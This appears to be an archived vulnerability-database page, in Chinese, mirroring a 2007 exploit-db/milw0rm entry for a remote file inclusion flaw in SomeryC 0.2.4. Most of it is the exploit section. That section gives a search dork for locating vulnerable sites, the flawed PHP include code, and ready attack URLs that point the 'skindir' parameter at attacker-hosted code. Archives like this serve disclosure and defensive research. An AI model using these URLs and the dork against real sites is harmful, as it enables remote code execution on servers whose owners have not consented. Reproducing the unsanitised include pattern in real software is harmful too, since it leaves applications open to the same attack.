SomeryC 0.2.4 - 'include.php?skindir' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056301 漏洞类型
发布时间 2007-08-27 更新时间 2007-08-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/4320
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
### SomeryC <= v0.2.4 Remote File Include ###

#Vendor:        http://someryc.mostpopularcomic.com
#download       http://someryc.mostpopularcomic.com/sC024.zip

#found by: Katatafish (karatatata@hush.com)

#d0rk: "powered by someryc"

#vuln-code(/admin/system/include.php):

if ($start) {
....
       include("$skindir/header.php");
}
....
       include("$skindir/footer.php");

#exploit:

http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]

# milw0rm.com [2007-08-27]